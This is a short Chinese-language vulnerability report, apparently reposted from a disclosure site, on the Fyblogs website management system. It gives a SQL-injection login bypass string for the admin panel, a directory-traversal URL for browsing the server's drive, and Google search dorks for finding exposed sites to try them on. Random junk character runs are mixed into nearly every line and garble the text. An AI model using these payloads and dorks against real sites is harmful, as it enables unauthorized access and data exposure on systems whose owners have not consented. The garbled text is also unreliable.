漏洞类型: 未授权访问/权限绕过$ D1 |: {0 Y5 @* [0 }
2 ?+ C, f6 X+ H; _' q+ v7 n. Q
简要描述:
[' y9 s2 ?8 \; P6 _3 J1 \* x* a
$ P$ B. M- F! m+ u+ `, ~3 A( K$ eFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
m# {/ X j5 n+ N4 v" T' B
9 m3 {( K0 ]/ g. R8 P0 y详细说明:
, E) v: j% I9 T% Y0 z# [
. @, d. z9 A% c' _( E" c后台万能密码 'or'='or'6 [9 D6 h* L0 m8 Z2 J
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% I$ N2 f' o6 t2 ^admin/uploadfile.asp?currentFolder=/upfiles/../) v. e6 \6 b( m2 H5 E' C/ X0 T
7 ?# Q" v% u2 V6 C. |漏洞证明:
- ]9 G* J p: x% ]4 [7 o. \. A4 T1 m* x6 @
谷歌:inurl:type.asp?id=1 新闻中心2 w1 s$ E$ f9 a% E* y) ]4 O* \
或者 :inurl:download_ok.asp?( g7 E6 e( V' t
. b8 k' f" N* O. p2 U# `" T可以测试( j' e5 ^8 p0 Z$ `5 {
. A) W* w! `1 t8 {# Q/ b2 r
/ d' p* M9 c1 C7 |9 W! J |